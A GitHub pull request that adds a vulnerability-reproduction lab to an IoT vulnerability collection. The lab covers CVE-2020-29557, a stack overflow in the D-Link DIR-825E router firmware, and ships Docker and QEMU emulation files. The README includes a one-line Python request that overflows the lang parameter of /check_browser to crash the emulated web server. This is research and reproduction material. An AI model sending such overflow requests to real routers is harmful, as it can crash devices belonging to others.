Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ADD CVE-2020-29557 #8

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

ADD CVE-2020-29557 #8

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 24 additions & 0 deletions D-Link/CVE-2020-29557/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
# D-Link DIR-825E 栈溢出漏洞


## 用户级模拟 - 快速验证

手动构建:

```sh
docker-compose up -d --build
```

![](./images/index.png)

## 漏洞复现

```sh
python3 -c "__import__('requests').get('http://localhost:8888/check_browser?lang=%s'%('A'*0x200))"
```

![](./images/crash.png)

## 参考链接

- https://shaqed.github.io/dlink/
11 changes: 11 additions & 0 deletions D-Link/CVE-2020-29557/docker-compose.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
version: "3"

services:
user-emu:
container_name: cve2020_29557
build:
context: .
dockerfile: ./user-emu/Dockerfile
privileged: true
ports:
- "8888:80"
Binary file added D-Link/CVE-2020-29557/firmware/2019.09.16-12.45_DIR_825E_RT8197F_3.0.1_release.bin
View file
Open in desktop
Binary file not shown.
Binary file added D-Link/CVE-2020-29557/firmware/squashfs-root.tar
View file
Open in desktop
Binary file not shown.
Binary file added D-Link/CVE-2020-29557/images/crash.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added D-Link/CVE-2020-29557/images/index.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
12 changes: 12 additions & 0 deletions D-Link/CVE-2020-29557/user-emu/Dockerfile
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
FROM firmianay/qemu-user-static
LABEL Author="[email protected]"

WORKDIR /root

# 复制固件
ADD ./firmware/*.tar .
RUN cp /usr/bin/qemu-mipsel-static ./squashfs-root

COPY ./user-emu/run.sh /root/run.sh
RUN chmod +x /root/run.sh
CMD [ "/bin/sh", "-c", "/root/run.sh" ]
6 changes: 6 additions & 0 deletions D-Link/CVE-2020-29557/user-emu/run.sh
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
#!/bin/bash

cd /root/squashfs-root
chroot . ./qemu-mipsel-static anweb -D

while true; do sleep 100; done
1 change: 1 addition & 0 deletions vuln_list.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -24,6 +24,7 @@

- [D-Link DIR-859 命令注入漏洞(CVE-2019-17621)](https://github.com/firmianay/IoT-vulhub/tree/master/D-Link/CVE-2019-17621)
- [D-Link DIR-842 路由器缓冲区溢出漏洞(CVE-2020-8962)](https://github.com/firmianay/IoT-vulhub/tree/master/D-Link/CVE-2020-8962)
- [D-Link DIR-825 栈溢出漏洞(CVE-2020-29557)](https://github.com/firmianay/IoT-vulhub/tree/master/D-Link/CVE-2020-29557)

## Tenda

Expand Down